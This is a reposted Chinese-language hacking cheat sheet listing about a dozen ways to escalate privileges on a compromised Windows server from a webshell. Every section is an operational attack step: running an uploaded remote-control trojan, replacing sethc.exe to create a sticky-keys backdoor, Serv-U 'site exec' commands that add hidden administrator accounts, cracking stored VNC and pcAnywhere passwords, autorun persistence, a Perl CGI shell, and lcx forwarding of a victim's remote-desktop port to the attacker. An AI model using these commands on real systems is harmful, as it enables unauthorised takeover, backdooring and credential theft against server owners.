几种可以提权的办法

可以执行CMD时候

1.A:将远控的后缀改为.tmp，然后上传上去~！

B:将该远控传上去。

C：用命令start e:/admin/admin.tmp，然后等着木马上线~！

2.替换服务 提权shift键

A:在CMD下执行一下命令： copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

B:链接远程桌面，然后连续按5次shift键，就可以浏览C盘了~！然后C盘windows里面TSadmin.exe可 以查看用户的上线情况。

3.不能执行EXE那么你可以尝试传一个BAT文件或者VBS然后运行~！

4.Cmd命令下终结提权 恢复命令 值的收藏 2000 c:\WINNT\syetem32\inetsrv\httpext.dll c:\WINNT\syetem32\inetsrv\httpodbc.dll c:\WINNT\syetem32\inetsrv\ssinc.dll c:\WINNT\syetem32\inetsrv\msw3prt.dll c:\WINNT\syetem32\inetsrv\asp.dll 2003/xp c:\windows\syetem32\inetsrv\httpext.dll c:\windows\syetem32\inetsrv\httpodbc.dll c:\windows\syetem32\inetsrv\ssinc.dll c:\windows\syetem32\inetsrv\msw3prt.dll c:\windows\syetem32\inetsrv\asp.dll

5.当不能执行CMD时候.

A:我们可以上传ASPX马来执行，CMD命令~！

B:如果不能执行NET就可以执行NET1来创建用户。NET1不行就用巴西烤肉，2000系统不可以~！ 只有2003的系统可以，我们可以先用NET START来看看系统~！

-----------------------------------不可以用CMD命令的时候---------------------------------

6.serv-U

A:可读可写 [USER=wind|1] Password=gn3436a2a7150feb9edf0151aec2bcbde2 ''密码：1234567'' HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access2=d:\|RWAMELCDP Access3=e:\|RWAMELCDP Access4=f:\|RWAMELCDP Access5=g:\|RWAMELCDP ftp 192.168.0.1

B:连接FTP，然后执行下面命令 Quote site exec net user xshuai$ xshuai /add quote site exec net localgroup administrators xshuai$ /add 如果提不上，大小写转换试试~！ quote site exec net.exe user kuba8 Aa123456 /add quote site exec net.exe localgroup Administrators kuba8 /add

C:可读不可写 直接用蛋蛋创建用户。然后远程登陆~！

7.pcAnywhere

A:用pcAnywhere下载网站目录下的CIF文件然后打开~！

B:如果没有就去C:\Documents and Settings\All Users里面找找~！

C:有就去破解下，密码就出来了~！

D:然后用pcAnywhere连接~！

8.FTPXP 需要下载的文件： quick.dat sites.dat stats.dat 然后拿到本地替换。然后用FTP自动登陆

9.VNC A:利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解

B:注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password

C:CMD先，然后输入VNC4X.exe -W。

D:输入那些数字，然后点回车，密码就出来了.最后用VNC登录。

10.如果装了MYSQL就去到C:\windows盘去找MY.INI文件，如果版本高的话就找PHP.INI。读取配置文件， 然后用牛族的去连接。。或者从网站里面找IPCONFIG.php或者CONN.PHP。。

11.方案一:如果program files目录可写的话可以用马来替换服务的启动项~！ 方案二:写个VBS或者BAT放入启动项里面创建一个用户，就可以提权了~！ 方案三:随便在A.B.C.D.E.F.G盘中的哪盘上传autorun.inf文件和VBS文件，然后等待重启就可以添加 用户。

12.利用perl提升权限（上传一个CGI脚本） c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell将CMD.PL放到PERL目录下的BIN目中。然后到网站上运行，然后在浏览器上输入 http://localhost/bin/CMD.PL?net user 就是查看用户(如果不能运行，可以试试改为cgi 扩展呢，把刚才的 pl文件改为 cgi文件) 然后建立一个用户就可以了~！ 11.端口映射LCX A:在自己机子的cmd下运行 lcx.exe -listen 51 3389 (意思是监听51端口并转发到3389端口) B:在SHELL上执行CMD比如LCX在C盘那么 C:\lcx.exe -slave 你的IP 51 肉机IP 3389 (意思是 把肉机的3389端口 转发到 自己的IP 51端口上) C:用本机的IP 连接，就可以了~！

转载于:https://www.cnblogs.com/94YY/archive/2011/05/19/2050857.html